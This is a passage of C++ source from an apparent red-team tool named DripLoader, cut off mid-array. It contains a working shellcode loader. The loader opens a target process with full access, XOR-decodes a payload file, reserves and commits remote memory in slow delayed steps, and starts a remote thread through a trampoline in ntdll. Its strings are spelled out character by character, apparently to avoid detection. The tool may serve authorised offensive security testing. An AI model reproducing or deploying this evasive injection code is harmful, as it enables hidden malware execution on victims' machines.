277 |         cout << '\n' << '\n' << '\n' << 'U' << 's' << 'a' << 'g' << 'e' << ':'
278 |              << ' ' << '\'' << 'D' << 'r' << 'i' << 'p' << 'L' << 'o' << 'a'
279 |              << 'd' << 'e' << 'r' << '.' << 'e' << 'x' << 'e' << ' ' << '<'
280 |              << 't' << 'a' << 'r' << 'g' << 'e' << 't' << '_' << 'p' << 'i'
281 |              << 'd' << '>' << ' ' << '<' << 'm' << 's' << '_' << 'd' << 'e' 
282 |              << 'l' << 'a' << 'y' << '_' << 'p' << 'e' << 'r' << '_' << 's' 
283 |              << 't' << 'e' << 'p' << '>' << '\'' << ' ' << 'o' << 'r' << ' ' 
284 |              << 'n' << 'o' << ' ' << 'a' << 'r' << 'g' << 'u' << 'm' << 'e' 
285 |              << 'n' << 't' << 's' << ' ' << 'f' << 'o' << 'r' << ' ' << 'i' 
286 |              << 'n' << 't' << 'e' << 'r' << 'a' << 'c' << 't' << 'i' << 'v' 
287 |              << 'e' << ' ' << 'm' << 'o' << 'd' << 'e' << '.' << '\n' << '\n';
288 |         return -1;
289 |     }
290 |     
291 |     HANDLE hProc = OpenProcess(
292 |         PROCESS_ALL_ACCESS, 
293 |         FALSE, 
294 |         tpid
295 |     );
296 | 
297 |     if (NULL == hProc) {
298 |         const char err_handle[]{ 'U', 'n', 'a', 'b', 'l', 'e', ' ', 't', 'o', ' ', 'a', 'c', 'q', 'u', 'i', 'r', 'e', ' ', 'h', 'a', 'n', 'd', 'l', 'e', ' ', 't', 'o', ' ', '%', 'd', '\n', '\0' };
299 |         printf(err_handle, tpid);
300 |         return -1;
301 |     }   
302 | 
303 |     SYSTEM_INFO sys_inf;
304 |     GetSystemInfo(&sys_inf);
305 | 
306 |     DWORD page_size{ sys_inf.dwPageSize };
307 |     DWORD alloc_gran{ sys_inf.dwAllocationGranularity };
308 | 
309 |     // still do it
310 |     if (NULL == page_size)
311 |         page_size = 0x1000;
312 | 
313 |     if (NULL == alloc_gran)
314 |         alloc_gran = 0x10000;
315 | 
316 |     int ret = run(
317 |         tpid, 
318 |         hProc, 
319 |         page_size, 
320 |         alloc_gran, 
321 |         fnamScBlob, 
322 |         msStepDelay
323 |     );
324 | 
325 |     Sleep(-1);
326 |     return ret;
327 | }
328 | 


--------------------------------------------------------------------------------
/DripLoader/Helpers.cpp:
--------------------------------------------------------------------------------
  1 | #include "DripLoader.h"
  2 | 
  3 | char task_info_bar[]{ 'T', 'a', 'r', 'g', 'e', 't', ' ', 'P', 'I', 'D', ':', ' ', '%', 'd', ',', ' ', 'C', 'u', 'r', 'r', 'e', 'n', 't', ' ', 's', 't', 'e', 'p', ':', ' ', '%', 'd', '/', '5', ',', ' ', 'T', 'i', 'm', 'e', ' ', 'n', 'e', 'e', 'd', 'e', 'd', ':', ' ', '%', 'f', ' ', 'm', 'i', 'n', 'u', 't', 'e', 's', '\n', '\n', '\0' };
  4 | char coffee_time[]{ ' ', ' ', ' ', ' ', ')', ')', ' ', ' ', '\\', '_', '_', '_', '/', '_', ' ', ' ', '\n', ' ', ' ', ' ', '|', '~', '~', '|', ' ', '/', '~', '~', '~', '\\', ' ', '\\', ' ', '\n', ' ', ' ', 'C', '|', '_', '_', '|', ' ', '\\', '_', '_', '_', '/', '\n', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', '`', '\'', '`', '\'', '`', ' ', ' ', ' ', '\n', '\n', '\0' };
  5 | 
  6 | char found_suitable_base[]{ '', '[', '3', '2', 'm', '[', '+', ']', ' ', 'F', 'o', 'u', 'n', 'd', ' ', 's', 'u', 'i', 't', 'a', 'b', 'l', 'e', ' ', 'b', 'a', 's', 'e', ' ', 'a', 'd', 'd', 'r', 'e', 's', 's', ' ', 'a', 't', '', '[', '0', 'm', ' ', '0', 'x', '%', 'x', '\n', '\0' };
  7 | char reserving_na[]{ '', '[', '3', '3', 'm', '[', '*', ']', ' ', 'R', 'e', 's', 'e', 'r', 'v', 'i', 'n', 'g', ' ', 'n', 'o', '-', 'a', 'c', 'c', 'e', 's', 's', ' ', 's', 'e', 'g', 'm', 'e', 'n', 't', 's', ' ', 'f', 'o', 'r', ' ', 'l', 'a', 't', 'e', 'r', ' ', 'u', 's', 'e', '', '[', '0', 'm', '\n', '\n', '\0' };
  8 | char reserved_na[]{ '', '[', '3', '2', 'm', '[', '+', ']', ' ', 'F', 'i', 'n', 'i', 's', 'h', 'e', 'd', ' ', 'r', 'e', 's', 'e', 'r', 'v', 'i', 'n', 'g', ' ', 'n', 'o', '-', 'a', 'c', 'c', 'e', 's', 's', ' ', 's', 'e', 'g', 'm', 'e', 'n', 't', 's', '', '[', '0', 'm', '\n', '\0' };
  9 | char commiting[]{ '', '[', '3', '3', 'm', '[', '*', ']', ' ', 'C', 'o', 'm', 'm', 'i', 't', 'i', 'n', 'g', ',', ' ', 'w', 'r', 'i', 't', 't', 'i', 'n', 'g', ',', ' ', 'p', 'r', 'o', 't', 'e', 'c', 't', 'i', 'n', 'g', '', '[', '0', 'm', '\n', '\n', '\0' };
 10 | char commited[]{ '', '[', '3', '2', 'm', '[', '+', ']', ' ', 'F', 'i', 'n', 'i', 's', 'h', 'e', 'd', ' ', 'c', 'o', 'm', 'm', 'i', 't', 'i', 'n', 'g', ',', ' ', 'w', 'r', 'i', 't', 't', 'i', 'n', 'g', ',', ' ', 'p', 'r', 'o', 't', 'e', 'c', 't', 'i', 'n', 'g', '', '[', '0', 'm', '\n', '\0' };
 11 | char do_tramp[]{ '', '[', '3', '3', 'm', '[', '*', ']', ' ', 'D', 'e', 'l', 'a', 'y', 'i', 'n', 'g', ' ', 't', 'r', 'a', 'm', 'p', 'o', 'l', 'i', 'n', 'e', ' ', 's', 'e', 't', 'u', 'p', ' ', 'i', 'n', ' ', 'n', 't', 'd', 'l', 'l', '.', 'R', 't', 'l', 'p', 'W', 'o', 'w', '6', '4', 'C', 't', 'x', 'F', 'r', 'o', 'm', 'A', 'm', 'd', '6', '4', '', '[', '0', 'm', '\n', '\n', '\0' };
 12 | char done_tramp[]{ '', '[', '3', '2', 'm', '[', '+', ']', ' ', 'F', 'i', 'n', 'i', 's', 'h', 'e', 'd', ' ', 's', 'e', 't', 't', 'i', 'n', 'g', ' ', 'u', 'p', ' ', 't', 'r', 'a', 'm', 'p', 'o', 'l', 'i', 'n', 'e', ' ', 'i', 'n', ' ', 'n', 't', 'd', 'l', 'l', '.', 'R', 't', 'l', 'p', 'W', 'o', 'w', '6', '4', 'C', 't', 'x', 'F', 'r', 'o', 'm', 'A', 'm', 'd', '6', '4', '', '[', '0', 'm', '\n', '\0' };
 13 | char do_thread[]{ '', '[', '3', '3', 'm', '[', '*', ']', ' ', 'D', 'e', 'l', 'a', 'y', 'i', 'n', 'g', ' ', 'r', 'e', 'm', 'o', 't', 'e', ' ', 't', 'h', 'r', 'e', 'a', 'd', ' ', 'c', 'r', 'e', 'a', 't', 'i', 'o', 'n', '', '[', '0', 'm', '\n', '\n', '\0' };
 14 | char done_thread[]{ '', '[', '3', '2', 'm', '[', '+', ']', ' ', 'D', 'r', 'o', 'p', 'p', 'e', 'd', ' ', 'a', ' ', 't', 'h', 'r', 'e', 'a', 'd', ' ', 'o', 'n', ' ', 'n', 't', 'd', 'l', 'l', '.', 'R', 't', 'l', 'p', 'W', 'o', 'w', '6', '4', 'C', 't', 'x', 'F', 'r', 'o', 'm', 'A', 'm', 'd', '6', '4', '+', '0', 'x', '0', '', '[', '0', 'm', '\n', '\n', '\n', '\0' };
 15 | char done[]{ 'D', 'o', 'n', 'e', ' ', ':', '>', '\n', '\n', '\n', '\0' };
 16 | 
 17 | char bar_format[]{ ' ', ' ', ' ', '%', '3', 'd', '%', '%', ' ', '[', '%', '.', '*', 's', '%', '*', 's', ']', '\0' };
 18 | 
 19 | void EnableAnsiSupport()
 20 | {
 21 |     HANDLE hOut = GetStdHandle(STD_OUTPUT_HANDLE);
 22 |     DWORD dwMode = 0;
 23 |     GetConsoleMode(hOut, &dwMode);
 24 |     dwMode |= ENABLE_VIRTUAL_TERMINAL_PROCESSING;
 25 |     SetConsoleMode(hOut, dwMode);
 26 | }
 27 | 
 28 | void DelayShowProgress(double percentage, int step, int msStepDelay, int tpid, int time_needed, int vmbase)
 29 | {
 30 |     int val = (int)(percentage * 100);
 31 |     int lpad = (int)(percentage * PBAR_WDH);
 32 |     int rpad = PBAR_WDH - lpad;
 33 | 
 34 |     system("cls");
 35 | 
 36 |     printf(task_info_bar, tpid, step, (double)time_needed / 60000.0);
 37 |     printf(coffee_time);
 38 | 
 39 |     switch (step) {
 40 |     case 0:
 41 |         printf(found_suitable_base, vmbase);
 42 |         printf("\n");
 43 |         break;
 44 |     case 1:
 45 |         printf(found_suitable_base, vmbase);
 46 |         printf("\n");
 47 |         printf(reserving_na);
 48 |         break;
 49 |     case 2:
 50 |         printf(found_suitable_base, vmbase);
 51 |         printf(reserved_na);
 52 |         printf("\n");
 53 |         printf(commiting);
 54 |         break;
 55 |     case 3:
 56 |         printf(found_suitable_base, vmbase);
 57 |         printf(reserved_na);
 58 |         printf(commited);
 59 |         printf("\n");
 60 |         printf(do_tramp);
 61 |         break;
 62 |     case 4:
 63 |         printf(found_suitable_base, vmbase);
 64 |         printf(reserved_na);
 65 |         printf(commited);
 66 |         printf(done_tramp);
 67 |         printf("\n");
 68 |         printf(do_thread);
 69 |         break;
 70 |     case 5:
 71 |         printf(found_suitable_base, vmbase);
 72 |         printf(reserved_na);
 73 |         printf(commited);
 74 |         printf(done_tramp);
 75 |         printf(done_thread);
 76 |         printf(done);
 77 |         break;
 78 |     }
 79 | 
 80 |     if (step != 5) {
 81 |         printf(bar_format, val, lpad, PBAR, rpad, "");
 82 |         fflush(stdout);
 83 |         Sleep(msStepDelay);
 84 |     }
 85 | }
 86 | 
 87 | unsigned char* ReadProcessBlob(const char* fnamSc, DWORD* szSc) 
 88 | {
 89 |     DWORD szRead{ 0 };
 90 | 
 91 |     HANDLE hFile = CreateFileA(
 92 |         fnamSc,
 93 |         GENERIC_READ,
 94 |         NULL,
 95 |         NULL,
 96 |         OPEN_EXISTING,
 97 |         FILE_ATTRIBUTE_NORMAL,
 98 |         NULL
 99 |     );
100 |     
101 |     if (INVALID_HANDLE_VALUE == hFile)
102 |         return nullptr;
103 | 
104 |     SIZE_T szFile = GetFileSize(hFile, NULL);
105 |     *szSc = szFile;
106 | 
107 |     unsigned char* raw = new unsigned char[szFile];
108 |     unsigned char* sc = new unsigned char[szFile];
109 | 
110 |     if (!ReadFile(hFile, raw, szFile, &szRead, NULL))
111 |         return nullptr;
112 | 
113 |     int i;
114 | 
115 |     for (i = 0; i < szRead; i++) {
116 |         sc[i] = raw[i] ^ XOR_KEY;
117 |     }
118 | 
119 |     return sc;
120 | }
121 | 
122 | LPVOID GetSuitableBaseAddress(HANDLE hProc, DWORD szPage, DWORD szAllocGran, DWORD cVmResv)
123 | {
124 |     MEMORY_BASIC_INFORMATION mbi;
125 | 
126 |     for (auto base : VC_PREF_BASES) {
127 |         VirtualQueryEx(
128 |             hProc,
129 |             base,
130 |             &mbi,
131 |             sizeof(MEMORY_BASIC_INFORMATION)
132 |         );
133 | 
134 |         if (MEM_FREE == mbi.State) {
135 |             uint64_t i;
136 |             for (i = 0; i < cVmResv; ++i) {
137 |                 LPVOID currentBase = (void*)((DWORD_PTR)base + (i * szAllocGran));
138 |                 VirtualQueryEx(
139 |                     hProc,
140 |                     currentBase,
141 |                     &mbi,
142 |                     sizeof(MEMORY_BASIC_INFORMATION)
143 |                 );
144 |                 if (MEM_FREE != mbi.State)
145 |                     break;
146 |             }
147 |             if (i == cVmResv) {
148 |                 // found suitable base
149 |                 return base;
150 |             }
151 |         }
152 |     }
153 |     return nullptr;
154 | }
155 | 
156 | void PlayHeader() 
157 | {
158 |     char header1[]{ 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x2f, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x25, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x28, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x5f, 0x5f, 0x5f, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x5f, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x5f, 0x5f, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x5f, 0x5f, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2f, 0x20, 0x5f, 0x20, 0x5c, 0x5f, 0x5f, 0x5f, 0x5f, 0x28, 0x5f, 0x29, 0x5f, 0x5f, 0x20, 0x20, 0x2f, 0x20, 0x2f, 0x20, 0x20, 0x5f, 0x5f, 0x5f, 0x20, 0x20, 0x5f, 0x5f, 0x5f, 0x20, 0x5f, 0x5f, 0x5f, 0x5f, 0x2f, 0x20, 0x2f, 0x5f, 0x5f, 0x20, 0x5f, 0x5f, 0x5f, 0x5f, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x2f, 0x20, 0x2f, 0x2f, 0x20, 0x2f, 0x20, 0x5f, 0x5f, 0x2f, 0x20, 0x2f, 0x20, 0x5f, 0x20, 0x5c, 0x2f, 0x20, 0x2f, 0x5f, 0x5f, 0x2f, 0x20, 0x5f, 0x20, 0x5c, 0x2f, 0x20, 0x5f, 0x20, 0x60, 0x2f, 0x20, 0x5f, 0x20, 0x20, 0x2f, 0x20, 0x2d, 0x5f, 0x29, 0x20, 0x5f, 0x5f, 0x2f, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x2f, 0x5f, 0x5f, 0x5f, 0x5f, 0x2f, 0x5f, 0x2f, 0x20, 0x2f, 0x5f, 0x2f, 0x20, 0x2e, 0x5f, 0x5f, 0x2f, 0x5f, 0x5f, 0x5f, 0x5f, 0x2f, 0x5c, 0x5f, 0x5f, 0x5f, 0x2f, 0x5c, 0x5f, 0x2c, 0x5f, 0x2f, 0x5c, 0x5f, 0x2c, 0x5f, 0x2f, 0x5c, 0x5f, 0x5f, 0x2f, 0x5f, 0x2f, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2f, 0x5f, 0x2f, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x62, 0x79, 0x20, 0x46, 0x69, 0x6c, 0x69, 0x70, 0x20, 0x4f, 0x6c, 0x73, 0x7a, 0x61, 0x6b, 0x20, 0x20, 0x28, 0x40, 0x5f, 0x6c, 0x70, 0x76, 0x6f, 0x69, 0x64, 0x29, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x46, 0x2d, 0x53, 0x65, 0x63, 0x75, 0x72, 0x65, 0x20, 0x43, 0x6f, 0x75, 0x6e, 0x74, 0x65, 0x72, 0x63, 0x65, 0x70, 0x74, 0x20, 0x44, 0x52, 0x54, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x1b, 0x5b, 0x33, 0x31, 0x6d, 0x4d, 0x5a, 0x1b, 0x5b, 0x30, 0x6d, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x1b, 0x5b, 0x33, 0x31, 0x6d, 0x41, 0x52, 0x55, 0x48, 0x2e, 0x2e, 0x1b, 0x5b, 0x30, 0x6d, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0a, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x1b, 0x5b, 0x33, 0x31, 0x6d, 0x48, 0x2e, 0x2e, 0x2e, 0x2e, 0x2e, 0x2e, 0x2e, 0x1b, 